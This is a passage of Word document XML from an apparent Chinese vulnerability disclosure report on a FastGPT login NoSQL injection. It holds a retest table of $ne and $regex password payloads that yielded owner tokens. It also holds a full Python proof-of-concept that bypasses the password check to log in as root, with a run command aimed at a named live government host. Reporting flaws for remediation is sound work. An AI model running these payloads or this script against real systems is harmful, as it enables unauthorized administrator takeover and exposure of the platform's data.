            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="截图3_以root_Owner身份登录成功.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="5901454"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>步骤 4：注入向量复测与负面对照（2026-10-12）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2026-10-12 复测，多种操作符与负面对照结果如下表，证明漏洞稳定可复现且非巧合：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b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试项</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>请求 password 字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>$ne 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{"$ne": ""}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>code=200，token_len=289，memberName=Owner，role=owner（登录成功）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>$regex 注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{"$regex": "^.*$"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>code=200，token_len=289，memberName=Owner，role=owner（登录成功）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>$gt 注入（复测已被拒）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{"$gt": ""}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>code=503002（管理方部分修补，未覆盖全部向量）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>负面对照：错误密码</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>"wrong_password_2026"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>500</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>code=503002，无 token（正常拒绝）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>注：复测同时发现原 HTTPS 服务 TLS 异常，9001 端口以明文 HTTP 提供登录服务，账号口令与令牌在公网明文传输，危害进一步放大。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>五、漏洞验证脚本（POC）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>以下 POC 为只读验证脚本：每个目标仅发送 2 次登录请求（对照组+实验组），不修改任何数据，令牌本体不落盘。运行方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="283"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>python check_cve_2026_40351.py http://ai.zrzyhcxjs.wuhan.gov.cn:9001</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># 输出 "vulnerable": true 即定案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="283"/>
        <w:shd w:val="clear" w:fill="F2F2F2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/usr/bin/env python3</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># -*- coding: utf-8 -*-</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"""</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVE-2026-40351 FastGPT 登录接口 NoSQL 注入 - 只读验证脚本</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>影响版本: FastGPT Community Edition &lt; 4.14.9.5 (修复于 4.14.9.5)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>漏洞接口: POST /api/support/user/account/loginByPassword</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>原理: 密码字段未做运行时类型校验,MongoDB 查询直接拼接用户输入,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      注入 {"$ne": ""} 使密码比较恒真,绕过密码校验以任意存在用户身份登录,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">      典型利用: 以 root(平台管理员) 身份登录,拿到平台全部控制权。</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CVSS 3.1: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>本脚本每个目标仅发 1-2 次登录请求,不修改任何数据;token 不保存不落盘。</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>用法: python check_cve_2026_40351.py &lt;target&gt; [--user root]</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"""</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import argparse</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import json</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import sys</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import urllib3</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>import requests</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PAYLOAD_TEMPLATE = {"username": "{user}", "password": {"$ne": ""}}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>def check(target: str, user: str = "root", proxy: str | None = None, timeout: int = 20) -&gt; dict:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    url = target.rstrip("/") + "/api/support/user/account/loginByPassword"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    proxies = {"http": proxy, "https": proxy} if proxy else None</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = {"target": target, "username": user}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 对照组: 不存在账号 + 注入 payload,区分"账号不存在"与"密码错误"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ctrl = dict(PAYLOAD_TEMPLATE)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    ctrl["username"] = user + "_not_exist_probe"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        r = requests.post(url, json=ctrl, timeout=timeout, verify=False, proxies=proxies)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        d = r.json()</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["ctrl_code"] = d.get("code")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["ctrl_statusText"] = d.get("statusText")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["error"] = f"ctrl request failed: {e}"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return result</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        r = requests.post(url, json=dict(PAYLOAD_TEMPLATE, username=user),</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                          timeout=timeout, verify=False, proxies=proxies)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    except requests.RequestException as e:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["error"] = str(e)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return result</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    result["http_status"] = r.status_code</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    try:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        data = r.json()</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    except ValueError:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["error"] = "non-json response"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        return result</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    result["code"] = data.get("code")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    result["statusText"] = data.get("statusText")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    d = data.get("data") or {}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    if data.get("code") == 200 and isinstance(d, dict) and d.get("token") and d.get("user"):</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        u = d["user"]</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["vulnerable"] = True</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["login_user"] = {k: u.get(k) for k in ("username", "email", "role", "createTime") if k in u}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["token_len"] = len(d["token"])  # token 本体不落盘</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if isinstance(d.get("team"), dict):</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            result["team"] = {k: d["team"].get(k) for k in ("name", "role") if k in d["team"]}</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    else:</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        result["vulnerable"] = False</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return result</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
